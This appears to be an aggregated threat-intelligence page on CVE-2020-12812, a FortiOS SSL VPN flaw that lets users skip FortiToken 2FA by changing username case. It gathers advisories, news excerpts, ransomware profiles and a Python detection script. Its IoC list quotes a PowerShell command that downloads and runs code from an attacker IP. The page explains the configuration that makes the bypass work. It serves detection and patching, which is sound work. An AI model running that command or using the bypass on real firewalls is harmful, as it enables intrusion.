CVE-2020-12812
Published: 2020-07-24
Priority: P1 (94) · critical · CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Ransomware
CISA Known Exploited Vulnerability, remediation due 2022-05-03
Exploited in the wild
EPSS: 49.34% (98.7th percentile)
An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.
Affected (5 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortios | < 6.0.10 | 6.0.10 |
| fortinet | fortios | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | >= 6.2.0 < 6.2.4 | 6.2.4 |
| fortinet | fortitoken | — | — |
Detection & IOCs (extracted from sources)
- Command IoC: `-nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://84.32.190[.]37:80/ahgffxvbghgfv'))"`
- CVE-2020-12812 exploitation is triggered by changing the case of the username during SSL VPN authentication, allowing bypass of FortiToken 2FA. Detect anomalous SSL VPN logins where the username case differs from the registered account, particularly when LDAP authentication is in use.
- A misconfigured secondary LDAP Group used as fallback when local LDAP authentication fails is a key enabler of this attack. Audit FortiGate configurations for unnecessary secondary LDAP Groups and remove them to reduce attack surface.
- Play ransomware ransom notes follow the email format [seven random characters]@gmx[.]com. Hunt for this pattern in ransom note files (ReadMe.txt at C:\) to identify Play infections.
- Play ransomware uses a PHP-based web page to receive exfiltrated files. Monitor for outbound HTTP POST traffic to PHP upload endpoints (e.g., /u2/upload.php) as an exfiltration indicator.
- CVE-2020-12812 only affects FortiOS versions 6.4.0, 6.2.0 to 6.2.3, and 6.0.9 and below. Patched versions are FortiOS 6.4.1, 6.2.4, and 6.0.10 (released July 2020). Devices running patched versions are not vulnerable.
- The vulnerability requires a specific configuration to be exploitable: local user entries on the FortiGate must require 2FA, be linked to LDAP, and those users must belong to an LDAP group configured on the FortiGate. Devices without this configuration are not vulnerable to the 2FA bypass.
- As a temporary workaround for unpatched systems, Fortinet advises turning off username-case-sensitivity to prevent the 2FA bypass, and disabling all SSL-VPN functions until updates can be applied.
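The detection idea in the list above, as an added example that is not from the page or from Fortinet: parse FortiGate-style key=value SSL VPN log lines, flag successful logins whose username differs only in case from the provisioned account, and rate the hit higher when that account matches the precondition described above (a local entry that requires 2FA and is backed by LDAP). The log field names, the sample log lines and the user registry are constructed assumptions for illustration.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed registry of FortiGate local user entries (hypothetical names, not from the page).
# Maps the username exactly as provisioned -> (authentication type, FortiToken 2FA required).
REGISTERED_USERS: Dict[str, Tuple[str, bool]] = {
    "alice": ("ldap", True),    # the vulnerable combination: 2FA on a remote (LDAP) user
    "bob": ("local", True),     # 2FA on a purely local user: not the bypass precondition
    "carol": ("ldap", False),   # LDAP user without 2FA: nothing to bypass
}

# Constructed sample log lines in FortiGate-style key=value form.
# Field names (subtype, action, user, remip) are assumed for illustration.
SAMPLE_LOGS = """\
date=2025-12-20 time=08:01:40 type=event subtype=vpn action=tunnel-up user="ALICE" remip=203.0.113.10
date=2025-12-20 time=09:15:03 type=event subtype=vpn action=tunnel-up user="alice" remip=198.51.100.7
date=2025-12-20 time=10:22:55 type=event subtype=vpn action=tunnel-up user="Bob" remip=203.0.113.44
date=2025-12-20 time=11:05:19 type=event subtype=vpn action=tunnel-up user="CAROL" remip=203.0.113.91
date=2025-12-20 time=11:30:00 type=event subtype=vpn action=tunnel-up user="dave" remip=203.0.113.92
date=2025-12-20 time=11:31:00 type=event subtype=system action=login user="Alice" remip=203.0.113.93
"""

KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_kv(line: str) -> Dict[str, str]:
    """Split one key=value log line into a dict; quoted values keep only their inner text."""
    fields: Dict[str, str] = {}
    for m in KV_RE.finditer(line):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(2)
    return fields


@dataclass
class Finding:
    user_as_logged: str   # username exactly as it appeared in the login event
    registered_as: str    # username as provisioned on the FortiGate
    remip: str
    severity: str         # "high" when the 2FA-bypass precondition holds, else "low"


def case_mismatch_logins(log_text: str,
                         registry: Dict[str, Tuple[str, bool]] = REGISTERED_USERS) -> List[Finding]:
    """Flag SSL VPN logins whose username differs only in case from the registered account."""
    findings: List[Finding] = []
    by_folded = {name.lower(): name for name in registry}
    for line in log_text.splitlines():
        ev = parse_kv(line)
        if ev.get("subtype") != "vpn" or ev.get("action") != "tunnel-up":
            continue  # only successful SSL VPN tunnel events matter here
        user = ev.get("user", "")
        canonical = by_folded.get(user.lower())
        if canonical is None or user == canonical:
            continue  # unknown account, or an exact-case match: nothing to flag
        auth_type, needs_2fa = registry[canonical]
        # The bypass needs a local entry that requires 2FA and is backed by remote (LDAP) auth.
        severity = "high" if needs_2fa and auth_type != "local" else "low"
        findings.append(Finding(user, canonical, ev.get("remip", "?"), severity))
    return findings


if __name__ == "__main__":
    for f in case_mismatch_logins(SAMPLE_LOGS):
        print(f"[{f.severity}] login as '{f.user_as_logged}' "
              f"(registered '{f.registered_as}') from {f.remip}")
```

On a patched device or one with username-case-sensitivity disabled, a case-mismatched login is benign noise rather than a bypass, so the severity rating is a triage aid, not proof of exploitation.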
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
CISA
Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2020-12812 [CRITICAL] CWE-178 Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
Vulnerability: Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
Affected: Fortinet FortiOS
Fortinet FortiOS SSL VPN contains an improper authentication vulnerability that may allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they change the case in their username.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-12812
Remediation Due Date: 2022-05-03
Fortinet
FG-IR-19-283: An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below
vendor_fortinet·2020-07-24·CVSS 9.8
CVE-2020-12812 [CRITICAL] CWE-178 FG-IR-19-283
An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.
CVEs: CVE-2020-12812
CWEs: CWE-178, CWE-287
CVSS: 9.8 (critical)
Affected products: FortiOS, FortiToken
GHSA
GHSA-r9cj-q2hj-hfq9: An improper authentication vulnerability in SSL VPN in FortiOS 6
ghsa_unreviewed·2022-05-24
CVE-2020-12812 [HIGH] CWE-178 GHSA-r9cj-q2hj-hfq9: An improper authentication vulnerability in SSL VPN in FortiOS 6
An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.
VulnCheck
Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-12812 [CRITICAL] CWE-178 Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
Fortinet FortiOS SSL VPN contains an improper authentication vulnerability that may allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they change the case in their username.
Affected: Fortinet FortiOS
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.ic3.gov/media/news/2021/210402.pdf; https://www.ic3.gov/media/news/2021/210527.pdf; https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://us-cert.cisa.gov/ncas/alerts/aa21-321a; https://cisa.gov/news-events/cybersecurity-advisori
No detection rules found.
No public exploits indexed.
Bleepingcomputer
Over 10K Fortinet firewalls exposed to actively exploited 2FA bypass
blogs_bleepingcomputer·2026-01-02·CVSS 9.8
CVE-2020-12812 [CRITICAL] Over 10K Fortinet firewalls exposed to actively exploited 2FA bypass
## Over 10K Fortinet firewalls exposed to actively exploited 2FA bypass
By Sergiu Gatlan
Over 10,000 Fortinet firewalls are still exposed online and vulnerable to ongoing attacks exploiting a five-year-old critical two-factor authentication (2FA) bypass vulnerability.
Fortinet released FortiOS versions 6.4.1, 6.2.4, and 6.0.10 in July 2020 to address this flaw (tracked as CVE-2020-12812 ) and advised admins who couldn't immediately patch to turn off username-case-sensitivity to block 2FA bypass attempts targeting their devices.
This improper authentication security flaw (rated 9.8/10 in severity) was found in FortiGate SSL VPN and allows attackers to log in to unpatched firewalls without being prompted for the second factor of authentication (FortiToken) when the username's case is cha
Bleepingcomputer
Fortinet warns of 5-year-old FortiOS 2FA bypass still exploited in attacks
blogs_bleepingcomputer·2025-12-29·CVSS 9.8
CVE-2020-12812 [CRITICAL] Fortinet warns of 5-year-old FortiOS 2FA bypass still exploited in attacks
## Fortinet warns of 5-year-old FortiOS 2FA bypass still exploited in attacks
By Sergiu Gatlan
Fortinet has warned customers that threat actors are still actively exploiting a critical FortiOS vulnerability that allows them to bypass two-factor authentication (2FA) when targeting vulnerable FortiGate firewalls.
Tracked as CVE-2020-12812 , this improper authentication security flaw was found in FortiGate SSL VPN and enables attackers to log in to unpatched firewalls without being prompted for the second factor of authentication (FortiToken) when changing the case of the username.
"This happens when two-factor authentication is enabled in the 'user local' setting, and that user authentication type is set to a remote authentication method (eg: ldap)," Fortinet explained when it patched th
Fortinet
Product Security Advisory and Analysis: Observed Abuse of FG-IR-19-283 | Fortinet Blog
blogs_fortinet·2025-12-24·CVSS 9.8
CVE-2020-12812 [CRITICAL] Product Security Advisory and Analysis: Observed Abuse of FG-IR-19-283 | Fortinet Blog
PSIRT BLOGS
Product Security Advisory and Analysis: Observed Abuse of FG-IR-19-283
By Carl Windsor | December 24, 2025
Fortinet has observed recent abuse of the July 2020 vulnerability FG-IR-19-283 / CVE-2020-12812 in the wild based on specific configurations. This blog analysis describes the observed abuse and provides additional context so that administrators can confirm that they are not impacted and guidance based on Fortinet observations to prevent FG-IR-19-283 from being exploited.
Issue Description
In specific configurations, due to differences in behavior of LDAP Directories, FortiGates can allow LDAP users with two-factor authentication (2FA) configured to bypass 2FA and instead authenticate against LDAP directly.
This particular authentication behavior is caused by FortiGate
Tenable
Frequently Asked Questions About Iranian Cyber Operations
blogs_tenable·2025-06-27
Frequently Asked Questions About Iranian Cyber Operations
Tenable
CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
blogs_tenable·2025-01-14·CVSS 9.8
[CRITICAL] CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
Tenable
CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
blogs_tenable·2024-02-09·CVSS 9.8
[CRITICAL] CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
Sentinelone
Hive
blogs_sentinelone·2022-11-30
Hive
Tenable
AA22-257A: Cybersecurity Agencies Issue Joint Advisory on Iranian Islamic Revolutionary Guard Corps-Affiliated Attacks
blogs_tenable·2022-09-15
AA22-257A: Cybersecurity Agencies Issue Joint Advisory on Iranian Islamic Revolutionary Guard Corps-Affiliated Attacks
Trendmicro
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
blogs_trendmicro·2022-09-06
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
Ransomware
## Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa
Play is a new ransomware that takes a page out of Hive and Nokoyawa's playbook. The many similarities among them indicate that Play, like Nokoyawa, is operated by the same people.
By: Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares | 2022/09/06
In July, we investigated a spate of ransomware cases in the Latin American region that targeted government entities, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was derived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single word, “PL
Tenable
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
blogs_tenable·2021-08-25
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
Qualys
CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
blogs_qualys·2021-07-29·CVSS 10.0
[CRITICAL] CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
#### Table of Contents
- Top Routinely Exploited Vulnerabilities
- Detect CISAs Top Routinely Exploited Vulnerabilities using Qualys VMDR
- Recommendations
- Remediation and Mitigation
- Get Started Now
On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a cybersecurity advisory detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.
The advisory states, “If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the large
Fortinet
Prioritizing Patching is Essential for Network Integrity
blogs_fortinet·2021-06-01·CVSS 9.1
[CRITICAL] Prioritizing Patching is Essential for Network Integrity
PSIRT BLOGS
Prioritizing Patching is Essential for Network Integrity
By Carl Windsor | June 01, 2021
Regarding the FBI - CISA/NCSC alerts of FortiGate SSL-VPN vulnerabilities being exploited in the wild
A recent FBI advisory outlined that foreign hackers had gained access to a local US municipal government network after exploiting vulnerabilities in an unpatched Fortinet networking appliance.
This advisory, however, was not the result of cybercriminals targeting a newly identified security issue. The sad fact is, fixes for these vulnerabilities had been shared with affected customers over two years ago. This and similar incidents highlight that the failure to patch vulnerable systems still represents one of the most critical security gaps in many organizations and is responsible for th
Zscaler
Reduce Business Risk by Eliminating the VPN Attack Surface
blogs_zscaler·2021-05-27
Reduce Business Risk by Eliminating the VPN Attack Surface
Tenable
CVE-2018-13379, CVE-2019-5591, CVE-2020-12812: Fortinet Vulnerabilities Targeted by APT Actors
blogs_tenable·2021-04-08·CVSS 9.1
[CRITICAL] CVE-2018-13379, CVE-2019-5591, CVE-2020-12812: Fortinet Vulnerabilities Targeted by APT Actors
Fortinet
Patch and Vulnerability Management | Fortinet
blogs_fortinet·2021-04-03·CVSS 6.5
[MEDIUM] Patch and Vulnerability Management | Fortinet
PSIRT BLOGS
Patch and Vulnerability Management
By Carl Windsor | April 03, 2021
In May 2019, Fortinet issued a PSIRT advisory regarding an SSL vulnerability that had been identified by a third party research team and which we resolved. As part of this process, we issued a Customer Support Bulletin (CSB-200716-1) to highlight the need for customers to upgrade their affected systems. We also published a blog about this for our customers in August 2019 when this vulnerability was made public post-resolution at Black Hat in August 2019. Over a year later, the UK NCSC shared that these same vulnerabilities were still being targeted in the wild, and we published another blog in July 2020 and then another in November 2020 with the goal of continuing to educate and communicate with our customer
Threat Intel
Play (Play)
threat_intel·CVSS 9.1
[CRITICAL] Play (Play)
# Threat Actor Profile: Play
ATT&CK ID: G1040
Also known as: Play
## Overview
Play is a ransomware group that has been active since at least 2022 deploying Playcrypt ransomware against the business, government, critical infrastructure, healthcare, and media sectors in North America, South America, and Europe. Play actors employ a double-extortion model, encrypting systems after exfiltrating data, and are presumed by security researchers to operate as a closed group.(Citation: CISA Play Ransomware Advisory December 2023)(Citation: Trend Micro Ransomware Spotlight Play July 2023)
## Techniques (TTPs)
### Resource Development
- T1587.001 Malware
Usage: Play developed and employs Playcrypt ransomware.(Citation: Trend Micro Ransomware Spotlight Play July 2023)(Citation: CISA Play Ransomware A
Sentinelone
Hive
blogs_sentinelone·CVSS 9.8
[CRITICAL] Hive
# Hive Ransomware: In-Depth Analysis, Detection, Mitigation
## Summary of Hive Ransomware
Hive ransomware emerged in June 2021. Hive practices double extortion, demanding payment for a decryptor as well as for the non-release of stolen data. Hive operates as a RaaS (Ransomware-as-a-Service) and their campaigns are characterized as being aggressive and rapid. The payloads are non-stealth in their execution and full drive encryption can be achieved in just a few minutes. Hive operators make significant use of COTS tools and LOLBins during all stages of attack. They are also known to frequently attack healthcare and education organizations.
## What Does Hive Ransomware Target?
Hive ransomware targets a wide range of industries including healthcare, finance, retail, energy and manufacturin
Timeline: Published 2020-07-24 · Added to CISA KEV 2021-11-03 · Exploited in the wild